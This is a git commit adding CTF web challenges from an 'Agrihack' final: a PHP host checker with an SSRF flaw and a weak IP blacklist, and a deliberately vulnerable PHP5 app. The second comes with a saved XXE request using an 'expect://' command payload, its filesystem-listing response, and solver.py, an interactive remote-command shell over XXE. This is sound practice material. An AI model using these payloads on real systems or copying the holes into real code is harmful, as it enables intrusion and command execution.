add challenges

naufalardhani · Mar 7, 2024 · 49e04c7 · 49e04c7
1 parent 4c74887
commit 49e04c7
Show file tree

Hide file tree

Showing 118 changed files with 3,495 additions and 0 deletions.
diff --git a/Challenges/.DS_Store b/Challenges/.DS_Store
diff --git a/Challenges/Agrihack-0x08/.DS_Store b/Challenges/Agrihack-0x08/.DS_Store
diff --git a/Challenges/Agrihack-0x08/web/.DS_Store b/Challenges/Agrihack-0x08/web/.DS_Store
diff --git a/Challenges/Agrihack-0x08/web/final/.DS_Store b/Challenges/Agrihack-0x08/web/final/.DS_Store
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/.DS_Store b/Challenges/Agrihack-0x08/web/final/Ethernal/.DS_Store
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/docker-compose.yml b/Challenges/Agrihack-0x08/web/final/Ethernal/docker-compose.yml
@@ -0,0 +1,35 @@
+version: '3'
+
+services:
+
+ agrihack:
+ container_name: ethernal
+ build:
+ context: ./ethernal
+ volumes:
+ - ./ethernal/src:/var/www/html
+ ports: 
+ - "15013:80"
+ networks:
+ internal_network:
+ ipv4_address: 10.10.0.4
+
+ flag:
+ container_name: ethernal_flag
+ restart: always
+ build:
+ context: ./flag
+ volumes:
+ - ./flag/src:/app
+ networks:
+ internal_network:
+ ipv4_address: 10.10.0.5
+ expose:
+ - "80"
+
+networks:
+ internal_network:
+ driver: bridge
+ ipam:
+ config:
+ - subnet: 10.10.0.0/16
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/down.sh b/Challenges/Agrihack-0x08/web/final/Ethernal/down.sh
@@ -0,0 +1,4 @@
+# cd ethernal && docker compose down
+# cd ../flag && docker compose down
+docker compose down
+docker ps
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/Dockerfile b/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/Dockerfile
@@ -0,0 +1,5 @@
+FROM php:apache
+RUN apt-get update && apt-get upgrade -y
+
+COPY src/ /var/www/html/
+EXPOSE 80
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/src/index.php b/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/src/index.php
@@ -0,0 +1,66 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+ <meta charset="UTF-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
+ <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
+ <link rel="stylesheet" href="style.css">
+ <title>Cek Service Host</title>
+</head>
+<body>
+ <div class="container mt-5">
+ <h2 class="mb-4">Service Check</h2>
+
+
+ <form method="post">
+ <div class="form-group">
+ <label for="host">Hostname atau IP Address:</label>
+ <input type="text" class="form-control" id="host" name="host" required>
+ </div>
+ <button type="submit" name="submit" class="btn btn-primary">Cek Service</button>
+ </form>
+
+ <div class="mt-4">
+ <?php
+ $blacklist = ["10.10", "10.10.0.5", "127.0.0.1", "127.0"];
+ $issafe = 1;
+
+ if (isset($_POST['submit'])) {
+ $host = $_POST['host'];
+ foreach ($blacklist as $word) {
+ if (stripos($host, $word) !== false) {
+ echo "no no no...";
+ $issafe = 0;
+ $result = "invalid";
+ break;
+ } else {
+ $result = checkService($host);
+ }
+ }
+ echo '<div class="alert ' . ($result ? 'alert-success' : 'alert-danger') . '">';
+ echo htmlspecialchars($result);
+ echo '</div>';
+ }
+ ?>
+
+ </div>
+ </div>
+
+ <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
+ <script src="https://cdn.jsdelivr.net/npm/@popperjs/[email protected]/dist/umd/popper.min.js"></script>
+ <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
+</body>
+</html>
+
+<?php
+function checkService($host)
+{
+ $ch = curl_init($host);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+ $result = curl_exec($ch);
+ $statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
+ curl_close($ch);
+
+ return $result;
+}
+?>
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/flag/Dockerfile b/Challenges/Agrihack-0x08/web/final/Ethernal/flag/Dockerfile
@@ -0,0 +1,10 @@
+FROM python:3.10-slim-buster
+
+RUN groupadd -r nobody
+
+WORKDIR /app 
+COPY ./src /app
+RUN pip3 install --ignore-installed -r requirements.txt
+
+USER nobody
+CMD [ "python3", "-m" , "flask", "run", "--host=0.0.0.0"]
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/__pycache__/app.cpython-310.pyc b/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/__pycache__/app.cpython-310.pyc
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/app.py b/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/app.py
@@ -0,0 +1,13 @@
+from flask import Flask, request, render_template, redirect, url_for, render_template_string, jsonify
+
+app = Flask(__name__)
+
+@app.route('/flag', methods=['POST'])
+def index():
+ if request.form.get('flag') == 'show':
+ return "agrihack{d6723612-b6fa-4f7f-8198-c488765dcbcd}"
+ else:
+ return "Invalid request"
+
+if __name__ == '__main__':
+ app.run()
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/requirements.txt b/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/requirements.txt
@@ -0,0 +1 @@
+flask
diff --git a/Challenges/Agrihack-0x08/web/final/Ethernal/run.sh b/Challenges/Agrihack-0x08/web/final/Ethernal/run.sh
@@ -0,0 +1,4 @@
+# cd ethernal && docker compose up -d --build
+# cd ../flag && docker compose up -d --build
+docker compose up -d --build
+docker ps
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/.DS_Store b/Challenges/Agrihack-0x08/web/final/SV-IPB/.DS_Store
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/Dockerfile b/Challenges/Agrihack-0x08/web/final/SV-IPB/Dockerfile
@@ -0,0 +1,33 @@
+FROM ubuntu:trusty
+
+ENV DEBIAN_FRONTEND noninteractive
+
+COPY flag /etc/
+COPY --chown=www-data:www-data src /app/
+RUN set -eux; \
+ apt-get update; \
+ apt-get install -yq \
+ grep \
+ apache2 \
+ libapache2-mod-php5 \
+ php5-gd \
+ php5-curl \
+ php-pear \
+ php5-dev \
+ libcurl4-openssl-dev \
+ expect-dev \
+ php5-sqlite \
+ php-apc ; \
+ pecl install expect; \
+ echo "extension=expect.so" >> /etc/php5/apache2/php.ini; \
+ rm -rf /var/lib/apt/lists/*; \
+ echo "ServerName localhost" >> /etc/apache2/apache2.conf; \
+ sed -i "s/variables_order.*/variables_order = \"EGPCS\"/g" /etc/php5/apache2/php.ini; \
+ rm -fr /var/www/html && ln -s /app /var/www/html; \
+ service apache2 restart
+
+COPY httpd-foreground /usr/bin/
+RUN chmod 755 /usr/bin/httpd-foreground
+
+EXPOSE 80
+CMD ["/usr/bin/httpd-foreground"]
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/Vagrantfile b/Challenges/Agrihack-0x08/web/final/SV-IPB/Vagrantfile
@@ -0,0 +1,33 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+Vagrant.configure(2) do |config|
+ config.vm.box = "ubuntu/trusty64"
+ config.vm.box_check_update = true
+
+ #config.vm.network "forwarded_port", guest: 80, host: 8080
+ config.vm.network "private_network", ip: "192.168.33.10"
+ config.vm.synced_folder "penlab", "/app"
+ config.vm.provision "shell", inline: <<-SHELL
+ apt-get update
+ apt-get install -yq \
+ apache2 \
+ libapache2-mod-php5 \
+ php5-gd \
+ php5-curl \
+ php-pear \
+ php5-dev \
+ libcurl4-openssl-dev \
+ expect-dev \
+ php5-sqlite \
+ php-apc && \
+ pecl install expect && \
+ echo "extension=expect.so" >> /etc/php5/apache2/php.ini && \
+ rm -rf /var/lib/apt/lists/*
+ echo "ServerName localhost" >> /etc/apache2/apache2.conf && \
+ sed -i "s/variables_order.*/variables_order = \"EGPCS\"/g" /etc/php5/apache2/php.ini
+ rm -fr /var/www/html && ln -s /app /var/www/html
+ chown www-data:www-data /app -R
+ service apache2 restart
+ SHELL
+end
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/reference b/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/reference
@@ -0,0 +1,4 @@
+https://github.com/jbarone/xxelab
+https://gist.github.com/joernchen/3623896
+https://airman604.medium.com/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
+
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/request_rceeee b/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/request_rceeee
@@ -0,0 +1,27 @@
+POST /process.php HTTP/1.1
+Host: 127.0.0.1:5000
+Content-Length: 225
+sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118"
+sec-ch-ua-platform: "macOS"
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
+Content-Type: text/plain;charset=UTF-8
+Accept: */*
+Origin: http://127.0.0.1:5000
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1:5000/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE root [
+ <!ENTITY xxe SYSTEM "expect://ls$IFS/$IFS-la">]>
+<root>
+ <name>Joe</name>
+ <tel>ufgh</tel>
+ <email>START_&xxe;_END</email>
+ <password>kjh</password>
+</root>
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/response_rceee b/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/response_rceee
@@ -0,0 +1,35 @@
+HTTP/1.1 200 OK
+Date: Thu, 02 Nov 2023 16:13:30 GMT
+Server: Apache/2.4.7 (Ubuntu)
+X-Powered-By: PHP/5.5.9-1ubuntu4.29
+Vary: Accept-Encoding
+Content-Length: 1384
+Connection: close
+Content-Type: text/html
+
+Sorry, START_total 96
+drwxr-xr-x 1 root root 4096 Nov 2 16:05 .
+drwxr-xr-x 1 root root 4096 Nov 2 16:05 ..
+-rwxr-xr-x 1 root root 0 Nov 2 16:05 .dockerenv
+drwxr-xr-x 4 www-data www-data 4096 Nov 2 12:21 app
+drwxr-xr-x 1 root root 4096 Nov 2 12:28 bin
+drwxr-xr-x 2 root root 4096 Apr 10 2014 boot
+drwxr-xr-x 3 root root 4096 Nov 2 12:29 build
+drwxr-xr-x 5 root root 360 Nov 2 16:05 dev
+drwxr-xr-x 1 root root 4096 Nov 2 16:05 etc
+drwxr-xr-x 2 root root 4096 Apr 10 2014 home
+drwxr-xr-x 1 root root 4096 Nov 2 12:29 lib
+drwxr-xr-x 2 root root 4096 Dec 17 2019 lib64
+drwxr-xr-x 2 root root 4096 Dec 17 2019 media
+drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt
+drwxr-xr-x 2 root root 4096 Dec 17 2019 opt
+dr-xr-xr-x 223 root root 0 Nov 2 16:05 proc
+drwx------ 2 root root 4096 Dec 17 2019 root
+drwxr-xr-x 1 root root 4096 Nov 2 12:29 run
+drwxr-xr-x 1 root root 4096 Mar 25 2021 sbin
+drwxr-xr-x 2 root root 4096 Dec 17 2019 srv
+dr-xr-xr-x 13 root root 0 Nov 2 16:05 sys
+drwxrwxrwt 1 root root 4096 Nov 2 16:05 tmp
+drwxr-xr-x 1 root root 4096 Dec 17 2019 usr
+drwxr-xr-x 1 root root 4096 Nov 2 12:28 var
+_END is already registered!
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/docker-compose.yml b/Challenges/Agrihack-0x08/web/final/SV-IPB/docker-compose.yml
@@ -0,0 +1,8 @@
+version: '3'
+services:
+ app:
+ container_name: sv-ipb
+ build:
+ context: .
+ ports:
+ - "15015:80"
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/flag b/Challenges/Agrihack-0x08/web/final/SV-IPB/flag
@@ -0,0 +1 @@
+agrihack{d3pr3c4t3d_xml_l1b_4nd_exp3ct_wr4pp3r_mak3s_xx3_l34d_to_rce}
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/httpd-foreground b/Challenges/Agrihack-0x08/web/final/SV-IPB/httpd-foreground
@@ -0,0 +1,4 @@
+#!/bin/sh
+set -e
+rm -f /run/apache2/apache2.pid
+exec /usr/sbin/apache2ctl -DFOREGROUND
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/solver.py b/Challenges/Agrihack-0x08/web/final/SV-IPB/solver.py
@@ -0,0 +1,21 @@
+import re, os, requests
+
+def rce(cmd):
+ cmd = cmd.replace(" ", "$IFS")
+ p = f"""<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [<!ENTITY rce SYSTEM "expect://{cmd}"> ]>
+<root><username>
+&rce;</username><password>asd</password></root>
+"""
+ r = requests.post('http://localhost:15015/process.php', data=p)
+ pattern = re.compile(r'Sorry,(.*? couldn\'t be registered!)', re.DOTALL)
+ matches = re.findall(pattern, r.text)[0].replace("couldn't be registered!", "")
+
+ # print(r.text)
+ print(matches)
+
+if __name__ == "__main__":
+ os.system('clear')
+ while True:
+ cmd = input('root@ardhani:~$ ')
+ rce(cmd)
diff --git a/Challenges/Agrihack-0x08/web/final/SV-IPB/src/.DS_Store b/Challenges/Agrihack-0x08/web/final/SV-IPB/src/.DS_Store